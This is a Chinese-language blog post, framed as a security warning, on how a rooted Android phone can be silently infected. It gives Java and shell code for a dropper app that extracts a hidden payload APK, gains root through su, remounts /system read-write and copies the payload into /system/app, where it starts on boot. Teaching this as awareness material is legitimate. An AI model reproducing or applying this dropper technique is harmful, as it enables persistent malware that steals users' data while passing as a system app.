android手機root後的安全問題（一）植入apk

原創

sos995

2020-02-25 07:16

前提：你有一部已經root的android手機，並且手機中有busybox和superuser

導讀：本文介紹一種簡單的病毒以及如何“防禦”。

寫本博客的原因是：有無數用戶覺得root沒有什麼風險，或者風險不會降臨到自己頭上。這裏告訴大家，其實風險就在身邊！

這裏講的內容其實對於大多數開發者都不是什麼新鮮的事情了，使用的技術也非常一般和普遍。

雖然大家都知道可以這樣這樣，但是還是隨意下載軟件，不加小心，就會掉入陷阱。

有些人覺得，只要我下載軟件的時候檢查軟件所申請的權限就好了，其實沒有那麼簡單。

我們來看看如果一個軟件，獲得了一次root權限，那麼它可以作些什麼呢？

好吧，我們先來一次“靜默安裝”！

原理很簡單，基本上相當於把apk push到手機裏面，兩個選擇

data/app

system/app

如果我是病毒軟件，我肯定選擇push到system/app

我們需要製作兩個apk，一個是真正目的的（病毒，real.apk），另一個是假的殼子（fake.apk）

首先先製作real.apk，我們只是用來測試，所以這個apk沒有什麼實際內容（爲了節省大家時間，real.apk已經上傳）。

real.apk裏有一個receiver，用來監聽開機的廣播

Xml代碼

android.intent.action.BOOT_COMPLETED

還有一個activity，沒有什麼實質內容，然後編譯出apk，待用。

下面來製作殼子

新建一個android工程，將之前的real.apk複製到assets目錄下

然後新建一個activity來測試

這個殼子的很簡單，它只負責把真實的應用安裝到用戶手機中，我們再細分一下，首先，將文件assets/real.apk提取出來，放到自己的私有目錄中，在本例子中的目錄爲data/data/com.example.fake/files，這一步是不需要任何權限的

Java代碼

prepareButton.setOnClickListener(new View.OnClickListener() {
	public void onClick(View v) {
		File dataFolder = getFilesDir();
                File jar = new File(dataFolder.getAbsolutePath() + "/real.apk");
                copyFile("real.apk", jar, mResources);
	}
});

其中copFile函數見附件（就是一個簡單的io讀寫操作），這裏只給出僞代碼

Java代碼

InputStream myInput = null;
try
    myInput = resources.getAssets().open(filePath);
    ……
catch
……
finally
……

第一步已經完成了，下一步請求root權限，然後將real.apk惡意安裝給用戶。

這裏需要使用到busybox，命令如下

Shell代碼

busybox mount -o remount,rw /system
busybox cp /data/data/com.example.fake/files/real.apk /system/app/real.apk
busybox rm /data/data/com.example.fake/files/real.apk

之所以使用busybox，是因爲手機裏面可能沒有mount、cp、rm等命令（我的手機裏面就沒有）

當然superuser需要同意你使用root權限

至此，你的入侵行爲已經全部完成！

Java代碼

installButton.setOnClickListener(new View.OnClickListener() {
		public void onClick(View v) {
			String packageName = getPackageName();
			String[] commands = {"busybox mount -o remount,rw /system",
                                 "busybox cp /data/data/" + packageName + "/files/real.apk /system/app/real.apk",
                                 "busybox rm /data/data/" + packageName + "/files/real.apk"};
			Process process = null;
			DataOutputStream dataOutputStream = null;

			try {
				process = Runtime.getRuntime().exec("su");
				dataOutputStream = new DataOutputStream(process.getOutputStream());
				int length = commands.length;
				for (int i = 0; i < length; i++) {
					Log.e(TAG, "commands[" + i + "]:" + commands[i]);
					dataOutputStream.writeBytes(commands[i] + "\n");
				}
				dataOutputStream.writeBytes("exit\n");
				dataOutputStream.flush();
				process.waitFor();
			} catch (Exception e) {
				Log.e(TAG, "copy fail", e);
			} finally {
				try {
					if (dataOutputStream != null) {
						dataOutputStream.close();
					}
					process.destroy();
				} catch (Exception e) {
				}
			}
		}
	});
}

重啓手機之後，real.apk就能工作了，它會接收到開機廣播

如果你嵌入了更惡劣的代碼，比如偷發短信，竊取郵件，那麼用戶也是很難察覺的

real.apk在settings中會顯示在系統應用中，用戶不太會懷疑，即使懷疑了，他們也不敢輕易卸載！誰讓他們自己隨意刷rom呢，每個rom集成的軟件都不一樣。

如何防禦？！

我不知道如何防禦，最簡單的辦法就是，解壓你來路不明的apk文件，看看assets文件下有沒有什麼可疑文件。當然，病毒可能會去掉或者修改文件名的後綴！

我手機中安裝了卡巴斯基免費版，很可惜，它沒有查出病毒（即使你的real.apk嵌入更惡意的代碼）

大家可以試試其他殺毒軟件，比如……希望大家能給個反饋結果

請大家不要用root的手機隨意下載軟件，更不要以任何藉口製造任何病毒！

android手機root後的安全問題（一）

android手機root後的安全問題（二）

android手機root後的安全問題（三）

android手機root後的安全問題（四）